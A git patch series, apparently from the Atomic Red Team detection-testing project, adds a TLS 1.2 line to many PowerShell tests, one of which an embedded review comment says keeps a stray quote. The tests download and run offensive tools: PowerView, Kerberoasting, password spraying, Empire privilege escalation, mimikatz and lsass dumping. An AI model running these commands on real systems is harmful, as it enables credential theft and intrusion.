@@ -48,5 +48,6 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index a7a51aef..204e3985 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -127,6 +127,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index a13bed68..f73de2eb 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml @@ -59,6 +59,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" name: powershell diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index a79b95ec..83d13c9b 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml 
@@ -26,6 +26,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell @@ -60,6 +61,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -69,6 +71,7 @@ atomic_tests: prereq_command: | if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index 84f64dda..193d79de 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml 
@@ -53,6 +53,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose name: powershell - name: Find local admins on all machines in domain (PowerView) @@ -63,6 +64,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose name: powershell - name: Find Local Admins via Group Policy (PowerView) @@ -77,7 +79,9 @@ atomic_tests: type: Path default: $env:COMPUTERNAME executor: - command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b @@ -123,6 +127,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | 
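Review bot: The block-scalar conversion in the `@@ -77,7 +79,9 @@` hunk keeps the closing double quote from the old single-line form, so the new command ends with `-Verbose"` and PowerShell will see an unterminated string literal when the test runs. The line should end `Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose` with no trailing quote; the two equivalent conversions in T1134.001 in this same commit drop the quote correctly and can serve as the template. The commit message mentions a "syntax correction" for this file, but the stray quote is still present in the new side shown here.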
diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 1a95ff41..019d9ef3 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -54,7 +54,8 @@ atomic_tests: Write-Host "You will need to install Microsoft Word manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index afa612f3..84d9e7f0 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -53,6 +53,7 @@ atomic_tests: name: powershell elevation_required: false command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force - name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index d31d6b2a..6ef34667 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml 
@@ -62,6 +62,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml index 13b5dba6..2d0248d3 100644 --- a/atomics/T1134.001/T1134.001.yaml +++ b/atomics/T1134.001/T1134.001.yaml @@ -11,7 +11,9 @@ atomic_tests: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose name: powershell elevation_required: true - name: '`SeDebugPrivilege` token duplication' 
@@ -22,6 +24,8 @@ atomic_tests: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose name: powershell elevation_required: true diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index d7558832..7567f6f3 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -90,6 +90,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose name: powershell diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index e5e80e64..cb51c49b 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -23,6 +23,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 1aab927f..e941e8ec 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml 
@@ -14,6 +14,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl name: powershell diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 79e88e8f..135e5897 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -33,6 +33,7 @@ atomic_tests: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: | @@ -57,4 +58,4 @@ atomic_tests: name: powershell elevation_required: true command: New-LocalUser -Name "Administrator " -NoPassword - cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null \ No newline at end of file + cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index 52fb8b73..1936e8b1 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml 
@@ -55,9 +55,10 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: | Remove-Item #{jse_path} -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell From 88ad3fd322f0c9d7d000709472b2fd031d526366 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 18:41:22 +0000 Subject: [PATCH 49/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 119 +++++++++++++++++++-------------- atomics/T1003.001/T1003.001.md | 6 ++ atomics/T1003/T1003.md | 1 + atomics/T1033/T1033.md | 1 + atomics/T1053.005/T1053.005.md | 1 + atomics/T1055.012/T1055.012.md | 1 + atomics/T1055/T1055.md | 3 + atomics/T1069.002/T1069.002.md | 6 +- atomics/T1070.001/T1070.001.md | 1 + atomics/T1110.003/T1110.003.md | 1 + atomics/T1115/T1115.md | 1 + atomics/T1134.001/T1134.001.md | 2 + atomics/T1135/T1135.md | 1 + atomics/T1555/T1555.md | 1 + atomics/T1558.003/T1558.003.md | 1 + atomics/T1564/T1564.md | 1 + atomics/T1566.001/T1566.001.md | 1 + 17 files changed, 96 insertions(+), 52 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e4991964..55705447 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -1113,6 +1113,7 @@ credential-access: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction @@ -2338,6 +2339,7 @@ credential-access: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl name: powershell @@ -2851,6 +2853,7 @@ credential-access: ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ Expand-Archive $zippath $parentpath\wce -Force @@ -2892,6 +2895,7 @@ credential-access: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null 
@@ -2946,6 +2950,7 @@ credential-access: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} executor: @@ -3000,6 +3005,7 @@ credential-access: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() @@ -3083,10 +3089,9 @@ credential-access: supported_platforms: - windows executor: - command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1''); - get-process lsass | Out-Minidump - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore ' @@ -3221,10 +3226,9 @@ credential-access: prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" - -OutFile #{xordump_exe} - -' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} executor: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore 
@@ -4035,8 +4039,9 @@ credential-access: - description: NPPSpy.dll must be available in local temp directory prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} - get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll - -OutFile "$env:Temp\NPPSPY.dll" + get_prereq_command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" executor: command: |- Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32" @@ -4611,11 +4616,9 @@ credential-access: executor: name: powershell elevation_required: false - command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'' - -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain - #{domain} -Force - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force - name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d 
@@ -6925,6 +6928,7 @@ collection: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" @@ -15223,7 +15227,8 @@ privilege-escalation: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -15357,6 +15362,7 @@ privilege-escalation: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell @@ -15393,6 +15399,7 @@ privilege-escalation: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null 
@@ -15405,6 +15412,7 @@ privilege-escalation: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null @@ -16250,7 +16258,8 @@ privilege-escalation: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -17674,8 +17683,9 @@ privilege-escalation: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose name: powershell elevation_required: true - name: "`SeDebugPrivilege` token duplication" 
@@ -17686,8 +17696,9 @@ privilege-escalation: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique Token -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose name: powershell elevation_required: true T1546.005: @@ -20434,6 +20445,7 @@ defense-evasion: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell @@ -25272,6 +25284,7 @@ defense-evasion: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore 
@@ -30916,7 +30929,8 @@ defense-evasion: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -31050,6 +31064,7 @@ defense-evasion: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell @@ -31086,6 +31101,7 @@ defense-evasion: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -31098,6 +31114,7 @@ defense-evasion: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null 
@@ -35143,8 +35160,9 @@ defense-evasion: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose name: powershell elevation_required: true - name: "`SeDebugPrivilege` token duplication" @@ -35155,8 +35173,9 @@ defense-evasion: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique Token -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose name: powershell elevation_required: true T1205: @@ -44284,7 +44303,8 @@ persistence: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile 